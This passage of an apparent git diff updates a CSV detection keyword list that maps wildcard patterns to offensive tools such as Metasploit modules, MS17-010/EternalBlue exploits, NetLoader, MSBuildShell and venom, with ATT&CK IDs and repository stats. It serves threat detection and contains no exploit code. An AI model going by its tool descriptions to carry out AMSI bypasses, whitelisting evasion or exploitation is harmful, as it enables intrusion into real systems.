vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ms17_010_eternalblue.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ms17_010_psexec*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ms17_010_psexec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*MS17-010*","offensive_tool_keyword","POC","MS17-010 poc github repos","T1204.002","TA0002","N/A","N/A","Exploitation tools","https://github.com/worawit/MS17-010","1","0","N/A","N/A","10","2048","1127","2023-06-20T08:27:19Z","2017-06-19T16:47:31Z" -"*ms17-010_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ms14-068_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ms17_010_eternalblue*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ms17_010_eternalblue.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ms17_010_psexec*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ms17_010_psexec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*MS17-010*","offensive_tool_keyword","POC","MS17-010 poc github repos","T1204.002","TA0002","N/A","N/A","Exploitation tools","https://github.com/worawit/MS17-010","1","0","N/A","N/A","10","2049","1127","2023-06-20T08:27:19Z","2017-06-19T16:47:31Z" +"*ms17-010_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*MSBuild.exe NetLoader.xml*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*MSBuildShell*","offensive_tool_keyword","MSBuildShell","a Powershell Host running within MSBuild.exe This code lets you Bypass Application Whitelisting and Powershell.exe restrictions and gives you a shell that almost looks and feels like a normal Powershell session (Get-Credential. PSSessions -> Works. Tab Completion -> Unfortunately not). It will also bypass the Antimalware Scan Interface (AMSI). which provides enhanced malware protection for Powershell scripts","T1027 - T1086 - T1059 - T1064 - T1089","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/MSBuildShell","1","1","N/A","N/A","3","274","81","2019-08-02T06:46:52Z","2016-11-11T18:52:38Z" -"*MScholtes/PS2EXE*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" -"*msf_api_doc.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*MScholtes/PS2EXE*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*msf_api_doc.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*msf_cve_extracter.py*","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","458","106","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" -"*msf_exec.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msf_matchers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*msf_exec.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msf_matchers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*msf_payload.ps1*","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","421","130","2017-08-08T14:12:48Z","2017-07-23T17:01:19Z" "*msf-auxiliarys*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*msfconsole *","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*msfconsole*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfconsole.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfconsole_spec*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfcrawler.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfd.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfdb --component*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfdb --use-defaults*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfdb_helpers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfencode*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfJavaToolkit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*msfconsole*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfconsole.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfconsole_spec*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfcrawler.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfd.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfdb --component*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 